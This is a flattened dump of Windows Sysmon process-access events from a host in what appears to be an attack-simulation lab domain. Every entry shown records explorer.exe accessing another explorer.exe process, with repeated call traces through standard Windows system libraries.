16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 